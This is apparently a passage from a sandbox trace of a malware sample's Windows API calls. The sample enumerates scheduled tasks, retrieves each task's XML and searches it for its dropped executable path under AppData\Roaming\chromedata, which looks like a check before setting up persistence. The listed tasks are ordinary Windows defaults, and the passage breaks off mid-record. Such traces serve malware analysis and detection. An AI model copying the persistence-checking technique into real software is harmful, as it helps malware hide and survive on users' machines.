<Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.407] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict2</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"ef402a22-96ec-4526-a70a-85d0c36c85f6\">\r\n      <StartBoundary>2006-02-23T16:27:43</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4199]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.408] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.408] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.408] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.408] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.408] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.408] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.408] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x24, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.408] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe10) returned 0x0
	[0073.409] IRegisteredTaskCollection:get_Count (in: This=0x55fe10, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.409] IRegisteredTaskCollection:get_Item (in: This=0x55fe10, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff18) returned 0x0
	[0073.409] IRegisteredTask:get_Name (in: This=0x55ff18, pName=0x128e3c | out: pName=0x128e3c*="MsCtfMonitor") returned 0x0
	[0073.409] IRegisteredTask:get_Xml (in: This=0x55ff18, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)</Source>\r\n    <URI>Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor</URI>\r\n    <Description>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <ComHandler>\r\n      <ClassId>{01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.410] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)</Source>\r\n    <URI>Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor</URI>\r\n    <Description>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <ComHandler>\r\n      <ClassId>{01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.410] IUnknown:Release (This=0x55ff18) returned 0x0
	[0073.410] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.410] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe10) returned 0x0
	[0073.411] ITaskFolderCollection:get_Count (in: This=0x55fe10, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.411] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.411] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.411] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x25, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.411] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe68) returned 0x0
	[0073.411] IRegisteredTaskCollection:get_Count (in: This=0x55fe68, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.411] IRegisteredTaskCollection:get_Item (in: This=0x55fe68, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff60) returned 0x0
	[0073.411] IRegisteredTask:get_Name (in: This=0x55ff60, pName=0x128e3c | out: pName=0x128e3c*="SynchronizeTime") returned 0x0
	[0073.411] IRegisteredTask:get_Xml (in: This=0x55ff60, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\w32time.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\w32time.dll,-202)</Author>\r\n    <Description>$(@%systemroot%\\system32\\w32time.dll,-201)</Description>\r\n    <URI>Microsoft\\Windows\\Time Synchronization\\SynchronizeTime</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"TimeSyncWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\sc.exe</Command>\r\n      <Arguments>start w32time task_started</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.413] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\w32time.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\w32time.dll,-202)</Author>\r\n    <Description>$(@%systemroot%\\system32\\w32time.dll,-201)</Description>\r\n    <URI>Microsoft\\Windows\\Time Synchronization\\SynchronizeTime</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"TimeSyncWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\sc.exe</Command>\r\n      <Arguments>start w32time task_started</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.413] IUnknown:Release (This=0x55ff60) returned 0x0
	[0073.413] IUnknown:Release (This=0x55fe68) returned 0x0
	[0073.413] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe68) returned 0x0
	[0073.413] ITaskFolderCollection:get_Count (in: This=0x55fe68, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.413] IUnknown:Release (This=0x55fe68) returned 0x0
	[0073.413] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.413] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x26, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.413] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe48) returned 0x0
	[0073.414] IRegisteredTaskCollection:get_Count (in: This=0x55fe48, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.414] IRegisteredTaskCollection:get_Item (in: This=0x55fe48, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff20) returned 0x0
	[0073.414] IRegisteredTask:get_Name (in: This=0x55ff20, pName=0x128e3c | out: pName=0x128e3c*="UPnPHostConfig") returned 0x0
	[0073.414] IRegisteredTask:get_Xml (in: This=0x55ff20, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\upnphost.dll,-215)</Author>\r\n    <Description>$(@%systemroot%\\system32\\upnphost.dll,-216)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\UPnP\\UPnPHostConfig</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>config upnphost start= auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.416] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\upnphost.dll,-215)</Author>\r\n    <Description>$(@%systemroot%\\system32\\upnphost.dll,-216)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\UPnP\\UPnPHostConfig</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>config upnphost start= auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.416] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.416] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.416] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe48) returned 0x0
	[0073.416] ITaskFolderCollection:get_Count (in: This=0x55fe48, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.416] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.416] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.416] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x27, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.416] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe68) returned 0x0
	[0073.417] IRegisteredTaskCollection:get_Count (in: This=0x55fe68, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.417] IRegisteredTaskCollection:get_Item (in: This=0x55fe68, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff60) returned 0x0
	[0073.417] IRegisteredTask:get_Name (in: This=0x55ff60, pName=0x128e3c | out: pName=0x128e3c*="HiveUploadTask") returned 0x0
	[0073.417] IRegisteredTask:get_Xml (in: This=0x55ff60, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\User Profile Service\\HiveUploadTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\profsvc,-500)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\profsvc,-500)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\profsvc,-501)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2007-08-28T00:00:00</StartBoundary>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <Repetition>\r\n        <Interval>PT12H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RestartOnFailure>\r\n      <Interval>PT2M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{BA677074-762C-444b-94C8-8C83F93F6605}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.418] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\User Profile Service\\HiveUploadTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\profsvc,-500)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\profsvc,-500)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\profsvc,-501)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2007-08-28T00:00:00</StartBoundary>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <Repetition>\r\n        <Interval>PT12H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RestartOnFailure>\r\n      <Interval>PT2M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{BA677074-762C-444b-94C8-8C83F93F6605}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.418] IUnknown:Release (This=0x55ff60) returned 0x0
	[0073.418] IUnknown:Release (This=0x55fe68) returned 0x0
	[0073.418] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe68) returned 0x0
	[0073.419] ITaskFolderCollection:get_Count (in: This=0x55fe68, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.419] IUnknown:Release (This=0x55fe68) returned 0x0
	[0073.419] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.419] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x28, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.419] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe48) returned 0x0
	[0073.419] IRegisteredTaskCollection:get_Count (in: This=0x55fe48, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.419] IRegisteredTaskCollection:get_Item (in: This=0x55fe48, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff20) returned 0x0
	[0073.419] IRegisteredTask:get_Name (in: This=0x55ff20, pName=0x128e3c | out: pName=0x128e3c*="ResolutionHost") returned 0x0
	[0073.419] IRegisteredTask:get_Xml (in: This=0x55ff20, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\dps.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\dps.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\WDI\\ResolutionHost</URI>\r\n    <Description>$(@%systemroot%\\system32\\dps.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>10</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      